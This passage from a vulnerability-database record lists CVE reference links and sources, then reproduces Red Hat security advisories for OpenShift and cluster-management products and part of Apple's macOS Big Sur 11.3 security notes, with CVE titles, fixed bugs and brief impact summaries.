        "url": "https://access.redhat.com/security/cve/cve-2022-3787"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44716"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-26709"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0256"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-44717"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-26700"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-27405"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25308"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-26710"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1304"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25309"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-27404"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30699"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35527"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25310"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-32148"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23806"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1798"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22628"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0934"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-0308"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-37434"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44717"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3515"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22922"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27782"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27776"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27779"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30115"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22576"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-35260"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22926"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27781"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22945"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27774"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27775"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32205"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27780"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-35252"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-42916"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-42915"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22923"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
      },
      {
        "trust": 0.1,
        "url": "https://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:6182"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-21166"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-34903"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-21123"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:6560"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-21125"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html-single/install/index#installing"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:6507"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#critical"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-31129"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-36067"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32250"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html/release_notes/"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-424135"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-32208"
      },
      {
        "db": "PACKETSTORM",
        "id": "168158"
      },
      {
        "db": "PACKETSTORM",
        "id": "168213"
      },
      {
        "db": "PACKETSTORM",
        "id": "170741"
      },
      {
        "db": "PACKETSTORM",
        "id": "170303"
      },
      {
        "db": "PACKETSTORM",
        "id": "168289"
      },
      {
        "db": "PACKETSTORM",
        "id": "168503"
      },
      {
        "db": "PACKETSTORM",
        "id": "168378"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32208"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-424135",
        "ident": null
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-32208",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "168158",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "168213",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "170741",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "170303",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "168289",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "168503",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "168378",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32208",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2022-07-07T00:00:00",
        "db": "VULHUB",
        "id": "VHN-424135",
        "ident": null
      },
      {
        "date": "2022-08-25T15:25:12",
        "db": "PACKETSTORM",
        "id": "168158",
        "ident": null
      },
      {
        "date": "2022-09-01T16:30:25",
        "db": "PACKETSTORM",
        "id": "168213",
        "ident": null
      },
      {
        "date": "2023-01-26T15:29:09",
        "db": "PACKETSTORM",
        "id": "170741",
        "ident": null
      },
      {
        "date": "2022-12-19T13:48:31",
        "db": "PACKETSTORM",
        "id": "170303",
        "ident": null
      },
      {
        "date": "2022-09-07T17:09:04",
        "db": "PACKETSTORM",
        "id": "168289",
        "ident": null
      },
      {
        "date": "2022-09-26T15:37:32",
        "db": "PACKETSTORM",
        "id": "168503",
        "ident": null
      },
      {
        "date": "2022-09-14T15:08:07",
        "db": "PACKETSTORM",
        "id": "168378",
        "ident": null
      },
      {
        "date": "2022-07-07T13:15:08.467000",
        "db": "NVD",
        "id": "CVE-2022-32208",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2023-01-05T00:00:00",
        "db": "VULHUB",
        "id": "VHN-424135",
        "ident": null
      },
      {
        "date": "2025-05-05T17:18:13.390000",
        "db": "NVD",
        "id": "CVE-2022-32208",
        "ident": null
      }
    ]
  },
  "title": {
    "_id": null,
    "data": "Red Hat Security Advisory 2022-6159-01",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "168158"
      }
    ],
    "trust": 0.1
  },
  "type": {
    "_id": null,
    "data": "arbitrary, code execution",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "170303"
      }
    ],
    "trust": 0.1
  }
}

VAR-202012-1279

Vulnerability from variot - Updated: 2026-04-10 22:46

curl 7.41.0 through 7.73.0 is vulnerable to an improper check for certificate revocation due to insufficient verification of the OCSP response. HAXX libcurl is an open source client-side URL transfer library developed by Haxx (HAXX) in Sweden. The product supports protocols such as FTP, SFTP, TFTP and HTTP. A security vulnerability exists in libcurl that could be exploited by an attacker to read or write data in a session by acting as a man-in-the-middle through low-level OCSP authentication on libcurl. Description:

Red Hat Advanced Cluster Management for Kubernetes 2.3.0 images

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana gement_for_kubernetes/2.3/html/release_notes/

Security:

fastify-reply-from: crafted URL allows prefix scape of the proxied backend service (CVE-2021-21321)
fastify-http-proxy: crafted URL allows prefix scape of the proxied backend service (CVE-2021-21322)
nodejs-netmask: improper input validation of octal input data (CVE-2021-28918)
redis: Integer overflow via STRALGO LCS command (CVE-2021-29477)
redis: Integer overflow via COPY command for large intsets (CVE-2021-29478)
nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)
nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions (CVE-2020-28500)
golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing
-u- extension (CVE-2020-28851)
golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag (CVE-2020-28852)
nodejs-ansi_up: XSS due to insufficient URL sanitization (CVE-2021-3377)
oras: zip-slip vulnerability via oras-pull (CVE-2021-21272)
redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms (CVE-2021-21309)
nodejs-lodash: command injection via template (CVE-2021-23337)
nodejs-hosted-git-info: Regular Expression denial of service via shortcutMatch in fromUrl() (CVE-2021-23362)
browserslist: parsing of invalid queries could result in Regular Expression Denial of Service (ReDoS) (CVE-2021-23364)
nodejs-postcss: Regular expression denial of service during source map parsing (CVE-2021-23368)
nodejs-handlebars: Remote code execution when compiling untrusted compile templates with strict:true option (CVE-2021-23369)
nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in lib/previous-map.js (CVE-2021-23382)
nodejs-handlebars: Remote code execution when compiling untrusted compile templates with compat:true option (CVE-2021-23383)
openssl: integer overflow in CipherUpdate (CVE-2021-23840)
openssl: NULL pointer dereference in X509_issuer_and_serial_hash() (CVE-2021-23841)
nodejs-ua-parser-js: ReDoS via malicious User-Agent header (CVE-2021-27292)
grafana: snapshot feature allow an unauthenticated remote attacker to trigger a DoS via a remote API call (CVE-2021-27358)
nodejs-is-svg: ReDoS via malicious string (CVE-2021-28092)
nodejs-netmask: incorrectly parses an IP address that has octal integer with invalid character (CVE-2021-29418)
ulikunitz/xz: Infinite loop in readUvarint allows for denial of service (CVE-2021-29482)
normalize-url: ReDoS for data URLs (CVE-2021-33502)
nodejs-trim-newlines: ReDoS in .end() method (CVE-2021-33623)
nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe (CVE-2021-23343)
html-parse-stringify: Regular Expression DoS (CVE-2021-23346)
openssl: incorrect SSLv2 rollback protection (CVE-2021-23839)

For more details about the security issues, including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE pages listed in the References section.

Bugs:

RFE Make the source code for the endpoint-metrics-operator public (BZ# 1913444)
cluster became offline after apiserver health check (BZ# 1942589)
Bugs fixed (https://bugzilla.redhat.com/):

1913333 - CVE-2020-28851 golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing -u- extension 1913338 - CVE-2020-28852 golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag 1913444 - RFE Make the source code for the endpoint-metrics-operator public 1921286 - CVE-2021-21272 oras: zip-slip vulnerability via oras-pull 1927520 - RHACM 2.3.0 images 1928937 - CVE-2021-23337 nodejs-lodash: command injection via template 1928954 - CVE-2020-28500 nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions 1930294 - CVE-2021-23839 openssl: incorrect SSLv2 rollback protection 1930310 - CVE-2021-23841 openssl: NULL pointer dereference in X509_issuer_and_serial_hash() 1930324 - CVE-2021-23840 openssl: integer overflow in CipherUpdate 1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms 1936427 - CVE-2021-3377 nodejs-ansi_up: XSS due to insufficient URL sanitization 1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string 1940196 - View Resource YAML option shows 404 error when reviewing a Subscription for an application 1940613 - CVE-2021-27292 nodejs-ua-parser-js: ReDoS via malicious User-Agent header 1941024 - CVE-2021-27358 grafana: snapshot feature allow an unauthenticated remote attacker to trigger a DoS via a remote API call 1941675 - CVE-2021-23346 html-parse-stringify: Regular Expression DoS 1942178 - CVE-2021-21321 fastify-reply-from: crafted URL allows prefix scape of the proxied backend service 1942182 - CVE-2021-21322 fastify-http-proxy: crafted URL allows prefix scape of the proxied backend service 1942589 - cluster became offline after apiserver health check 1943208 - CVE-2021-23362 nodejs-hosted-git-info: Regular Expression denial of service via shortcutMatch in fromUrl() 1944822 - CVE-2021-29418 nodejs-netmask: incorrectly parses an IP address that has octal integer with invalid character 1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data 1945459 - CVE-2020-28469 nodejs-glob-parent: Regular expression denial of service 1948761 - CVE-2021-23369 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with strict:true option 1948763 - CVE-2021-23368 nodejs-postcss: Regular expression denial of service during source map parsing 1954150 - CVE-2021-23382 nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in lib/previous-map.js 1954368 - CVE-2021-29482 ulikunitz/xz: Infinite loop in readUvarint allows for denial of service 1955619 - CVE-2021-23364 browserslist: parsing of invalid queries could result in Regular Expression Denial of Service (ReDoS) 1956688 - CVE-2021-23383 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with compat:true option 1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe 1957410 - CVE-2021-29477 redis: Integer overflow via STRALGO LCS command 1957414 - CVE-2021-29478 redis: Integer overflow via COPY command for large intsets 1964461 - CVE-2021-33502 normalize-url: ReDoS for data URLs 1966615 - CVE-2021-33623 nodejs-trim-newlines: ReDoS in .end() method 1968122 - clusterdeployment fails because hiveadmission sc does not have correct permissions 1972703 - Subctl fails to join cluster, since it cannot auto-generate a valid cluster id 1983131 - Defragmenting an etcd member doesn't reduce the DB size (7.5GB) on a setup with ~1000 spoke clusters

Solution:

For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:

https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html

For Red Hat OpenShift Logging 5.0, see the following instructions to apply this update:

https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-u pgrading.html

Bugs fixed (https://bugzilla.redhat.com/):

1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Moderate: Red Hat OpenShift Container Storage 4.6.5 security and bug fix update Advisory ID: RHSA-2021:2479-01 Product: Red Hat OpenShift Container Storage Advisory URL: https://access.redhat.com/errata/RHSA-2021:2479 Issue date: 2021-06-17 CVE Names: CVE-2016-10228 CVE-2017-14502 CVE-2019-2708 CVE-2019-3842 CVE-2019-9169 CVE-2019-13012 CVE-2019-14866 CVE-2019-25013 CVE-2020-8231 CVE-2020-8284 CVE-2020-8285 CVE-2020-8286 CVE-2020-8927 CVE-2020-9948 CVE-2020-9951 CVE-2020-9983 CVE-2020-13434 CVE-2020-13543 CVE-2020-13584 CVE-2020-13776 CVE-2020-15358 CVE-2020-24977 CVE-2020-25659 CVE-2020-25678 CVE-2020-26116 CVE-2020-26137 CVE-2020-27618 CVE-2020-27619 CVE-2020-27783 CVE-2020-28196 CVE-2020-29361 CVE-2020-29362 CVE-2020-29363 CVE-2020-36242 CVE-2021-3139 CVE-2021-3177 CVE-2021-3326 CVE-2021-3449 CVE-2021-3450 CVE-2021-3528 CVE-2021-20305 CVE-2021-23239 CVE-2021-23240 CVE-2021-23336 ==================================================================== 1. Summary:

Updated images that fix one security issue and several bugs are now available for Red Hat OpenShift Container Storage 4.6.5 on Red Hat Enterprise Linux 8 from Red Hat Container Registry.

Description:

Red Hat OpenShift Container Storage is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Container Storage is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Container Storage provisions a multicloud data management service with an S3 compatible API.

Security Fix(es):

NooBaa: noobaa-operator leaking RPC AuthToken into log files (CVE-2021-3528)

For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

Currently, a newly restored PVC cannot be mounted if some of the OpenShift Container Platform nodes are running on a version of Red Hat Enterprise Linux which is less than 8.2, and the snapshot from which the PVC was restored is deleted. Workaround: Do not delete the snapshot from which the PVC was restored until the restored PVC is deleted. (BZ#1962483)
Previously, the default backingstore was not created on AWS S3 when OpenShift Container Storage was deployed, due to incorrect identification of AWS S3. With this update, the default backingstore gets created when OpenShift Container Storage is deployed on AWS S3. (BZ#1927307)
Previously, log messages were printed to the endpoint pod log even if the debug option was not set. With this update, the log messages are printed to the endpoint pod log only when the debug option is set. (BZ#1938106)
Previously, the PVCs could not be provisioned as the rook-ceph-mds did not register the pod IP on the monitor servers, and hence every mount on the filesystem timed out, resulting in CephFS volume provisioning failure. With this update, an argument --public-addr=podIP is added to the MDS pod when the host network is not enabled, and hence the CephFS volume provisioning does not fail. (BZ#1949558)
Previously, OpenShift Container Storage 4.2 clusters were not updated with the correct cache value, and hence MDSs in standby-replay might report an oversized cache, as rook did not apply the mds_cache_memory_limit argument during upgrades. With this update, the mds_cache_memory_limit argument is applied during upgrades and the mds daemon operates normally. (BZ#1951348)
Previously, the coredumps were not generated in the correct location as rook was setting the config option log_file to an empty string since logging happened on stdout and not on the files, and hence Ceph read the value of the log_file to build the dump path. With this update, rook does not set the log_file and keeps Ceph's internal default, and hence the coredumps are generated in the correct location and are accessible under /var/log/ceph/. (BZ#1938049)
Previously, Ceph became inaccessible, as the mons lose quorum if a mon pod was drained while another mon was failing over. With this update, voluntary mon drains are prevented while a mon is failing over, and hence Ceph does not become inaccessible. (BZ#1946573)
Previously, the mon quorum was at risk, as the operator could erroneously remove the new mon if the operator was restarted during a mon failover. With this update, the operator completes the same mon failover after the operator is restarted, and hence the mon quorum is more reliable in the node drains and mon failover scenarios. (BZ#1959983)

All users of Red Hat OpenShift Container Storage are advised to pull these new images from the Red Hat Container Registry.

Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

Bugs fixed (https://bugzilla.redhat.com/):

1938106 - [GSS][RFE]Reduce debug level for logs of Nooba Endpoint pod 1950915 - XSS Vulnerability with Noobaa version 5.5.0-3bacc6b 1951348 - [GSS][CephFS] health warning "MDS cache is too large (3GB/1GB); 0 inodes in use by clients, 0 stray files" for the standby-replay 1951600 - [4.6.z][Clone of BZ #1936545] setuid and setgid file bits are not retained after a OCS CephFS CSI restore 1955601 - CVE-2021-3528 NooBaa: noobaa-operator leaking RPC AuthToken into log files 1957189 - [Rebase] Use RHCS4.2z1 container image with OCS 4..6.5[may require doc update for external mode min supported RHCS version] 1959980 - When a node is being drained, increase the mon failover timeout to prevent unnecessary mon failover 1959983 - [GSS][mon] rook-operator scales mons to 4 after healthCheck timeout 1962483 - [RHEL7][RBD][4.6.z clone] FailedMount error when using restored PVC on app pod

References:

https://access.redhat.com/security/cve/CVE-2016-10228 https://access.redhat.com/security/cve/CVE-2017-14502 https://access.redhat.com/security/cve/CVE-2019-2708 https://access.redhat.com/security/cve/CVE-2019-3842 https://access.redhat.com/security/cve/CVE-2019-9169 https://access.redhat.com/security/cve/CVE-2019-13012 https://access.redhat.com/security/cve/CVE-2019-14866 https://access.redhat.com/security/cve/CVE-2019-25013 https://access.redhat.com/security/cve/CVE-2020-8231 https://access.redhat.com/security/cve/CVE-2020-8284 https://access.redhat.com/security/cve/CVE-2020-8285 https://access.redhat.com/security/cve/CVE-2020-8286 https://access.redhat.com/security/cve/CVE-2020-8927 https://access.redhat.com/security/cve/CVE-2020-9948 https://access.redhat.com/security/cve/CVE-2020-9951 https://access.redhat.com/security/cve/CVE-2020-9983 https://access.redhat.com/security/cve/CVE-2020-13434 https://access.redhat.com/security/cve/CVE-2020-13543 https://access.redhat.com/security/cve/CVE-2020-13584 https://access.redhat.com/security/cve/CVE-2020-13776 https://access.redhat.com/security/cve/CVE-2020-15358 https://access.redhat.com/security/cve/CVE-2020-24977 https://access.redhat.com/security/cve/CVE-2020-25659 https://access.redhat.com/security/cve/CVE-2020-25678 https://access.redhat.com/security/cve/CVE-2020-26116 https://access.redhat.com/security/cve/CVE-2020-26137 https://access.redhat.com/security/cve/CVE-2020-27618 https://access.redhat.com/security/cve/CVE-2020-27619 https://access.redhat.com/security/cve/CVE-2020-27783 https://access.redhat.com/security/cve/CVE-2020-28196 https://access.redhat.com/security/cve/CVE-2020-29361 https://access.redhat.com/security/cve/CVE-2020-29362 https://access.redhat.com/security/cve/CVE-2020-29363 https://access.redhat.com/security/cve/CVE-2020-36242 https://access.redhat.com/security/cve/CVE-2021-3139 https://access.redhat.com/security/cve/CVE-2021-3177 https://access.redhat.com/security/cve/CVE-2021-3326 https://access.redhat.com/security/cve/CVE-2021-3449 https://access.redhat.com/security/cve/CVE-2021-3450 https://access.redhat.com/security/cve/CVE-2021-3528 https://access.redhat.com/security/cve/CVE-2021-20305 https://access.redhat.com/security/cve/CVE-2021-23239 https://access.redhat.com/security/cve/CVE-2021-23240 https://access.redhat.com/security/cve/CVE-2021-23336 https://access.redhat.com/security/updates/classification/#moderate

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iQIVAwUBYMtu/9zjgjWX9erEAQh6fhAAm9UPxF0e8ubzCEae+bkQAduwCkzpQ0ND Q1/UcDAAc4ueEhBrwXPhOLrgfBj+VG+QA19YZcNPzbW7I48RGjCm5WccnUyEbFAo FKTspCZW7FkXKBU15u58c/sFCGa4/Yuu+IpqCMuZ6lR2g9WHIBKdVtaB4y59AyfS v59cAorqZ3AoTX4lVys6HfDGySQWlg5P8t6ST72cUJjESi6U0HV00P7ECU2SFxCF HXA4gbXbZ1EPb/1+UkRRnXemJuT8SaRFRTrzj9woTrVAGQFvn+yjxLbZxVZb0WDd 6QeNpiJNICfL+/ExvEmGQucf7NcekYPWud11pnRUfQ+Uqsj+I7YoaepXAAolLzvN kAVVpFNsWADOVz7BrfSKoo4b38UCFOEUSd2d1ijCNE96Q9XyNUpn+kZqz0/wpBQC L+E5N9kEuaLyDBoI0wJAfoqU1NY4Cvl6lIMDgHUv2CE10zxhFwHCDulAfcQgxNQG sIbpSgSegq9HfZSDxa6Rtrox1I7oGhnBy10sIwUUH1+fxAusUk+Xrxf8hUv8KgDz V144yrGwN/6KVxh74A60bJX3ai12l6fC8bkmsxg5K1r/Dk4tUkQeXNdBbaK/rEKO AQs7YDab/0VA2qKtXDRkbnzqBRSbamDNOO/jd28nGMoclaIRHCzQgJRFv6Qb6dwT RCrstqAM5QQ=DHD0 -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce .

Bug Fix(es):

WMCO patch pub-key-hash annotation to Linux node (BZ#1945248)
LoadBalancer Service type with invalid external loadbalancer IP breaks the datapath (BZ#1952917)
Telemetry info not completely available to identify windows nodes (BZ#1955319)
WMCO incorrectly shows node as ready after a failed configuration (BZ#1956412)
kube-proxy service terminated unexpectedly after recreated LB service (BZ#1963263)
Solution:

For Windows Machine Config Operator upgrades, see the following documentation:

https://docs.openshift.com/container-platform/4.7/windows_containers/window s-node-upgrades.html

Bugs fixed (https://bugzilla.redhat.com/):

1945248 - WMCO patch pub-key-hash annotation to Linux node 1946538 - CVE-2021-25736 kubernetes: LoadBalancer Service type don't create a HNS policy for empty or invalid external loadbalancer IP, what could lead to MITM 1952917 - LoadBalancer Service type with invalid external loadbalancer IP breaks the datapath 1955319 - Telemetry info not completely available to identify windows nodes 1956412 - WMCO incorrectly shows node as ready after a failed configuration 1963263 - kube-proxy service terminated unexpectedly after recreated LB service

Bugs fixed (https://bugzilla.redhat.com/):

1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers 1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve

JIRA issues fixed (https://issues.jboss.org/):

TRACING-1725 - Elasticsearch operator reports x509 errors communicating with ElasticSearch in OpenShift Service Mesh project

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

APPLE-SA-2021-04-26-2 macOS Big Sur 11.3

macOS Big Sur 11.3 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT212325.

APFS Available for: macOS Big Sur Impact: A local attacker may be able to elevate their privileges Description: A logic issue was addressed with improved state management. CVE-2021-1853: Gary Nield of ECSC Group plc and Tim Michaud(@TimGMichaud) of Zoom Video Communications

AppleMobileFileIntegrity Available for: macOS Big Sur Impact: A malicious application may be able to bypass Privacy preferences Description: An issue in code signature validation was addressed with improved checks. CVE-2021-1849: Siguza

Apple Neural Engine Available for: macOS Big Sur Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds read was addressed with improved input validation. CVE-2021-1867: Zuozhi Fan (@pattern_F_) and Wish Wu(吴潍浠) of Ant Group Tianqiong Security Lab

Archive Utility Available for: macOS Big Sur Impact: A malicious application may bypass Gatekeeper checks Description: A logic issue was addressed with improved state management. CVE-2021-1810: an anonymous researcher

Audio Available for: macOS Big Sur Impact: An application may be able to read restricted memory Description: A memory corruption issue was addressed with improved validation. CVE-2021-1808: JunDong Xie of Ant Security Light-Year Lab

CFNetwork Available for: macOS Big Sur Impact: Processing maliciously crafted web content may disclose sensitive user information Description: A memory initialization issue was addressed with improved memory handling. CVE-2021-1857: an anonymous researcher

CoreAudio Available for: macOS Big Sur Impact: Processing a maliciously crafted audio file may disclose restricted memory Description: An out-of-bounds read was addressed with improved input validation. CVE-2021-1846: JunDong Xie of Ant Security Light-Year Lab

CoreAudio Available for: macOS Big Sur Impact: A malicious application may be able to read restricted memory Description: A memory corruption issue was addressed with improved validation. CVE-2021-1809: JunDong Xie of Ant Security Light-Year Lab

CoreFoundation Available for: macOS Big Sur Impact: A malicious application may be able to leak sensitive user information Description: A validation issue was addressed with improved logic. CVE-2021-30659: Thijs Alkemade of Computest

CoreGraphics Available for: macOS Big Sur Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed with improved validation. CVE-2021-1847: Xuwei Liu of Purdue University

CoreText Available for: macOS Big Sur Impact: Processing a maliciously crafted font may result in the disclosure of process memory Description: A logic issue was addressed with improved state management. CVE-2021-1811: Xingwei Lin of Ant Security Light-Year Lab

curl Available for: macOS Big Sur Impact: An attacker may provide a fraudulent OCSP response that would appear valid Description: This issue was addressed with improved checks. CVE-2020-8286: an anonymous researcher

curl Available for: macOS Big Sur Impact: A remote attacker may be able to cause a denial of service Description: A buffer overflow was addressed with improved input validation. CVE-2020-8285: xnynx

DiskArbitration Available for: macOS Big Sur Impact: A malicious application may be able to modify protected parts of the file system Description: A permissions issue existed in DiskArbitration. This was addressed with additional ownership checks. CVE-2021-1784: Mikko Kenttälä (@Turmio_) of SensorFu, Csaba Fitzl (@theevilbit) of Offensive Security, and an anonymous researcher

FaceTime Available for: macOS Big Sur Impact: Muting a CallKit call while ringing may not result in mute being enabled Description: A logic issue was addressed with improved state management. CVE-2021-1872: Siraj Zaneer of Facebook

FontParser Available for: macOS Big Sur Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2021-1881: an anonymous researcher, Xingwei Lin of Ant Security Light-Year Lab, Mickey Jin of Trend Micro, and Hou JingYi (@hjy79425575) of Qihoo 360

Foundation Available for: macOS Big Sur Impact: An application may be able to gain elevated privileges Description: A memory corruption issue was addressed with improved validation. CVE-2021-1882: Gabe Kirkpatrick (@gabe_k)

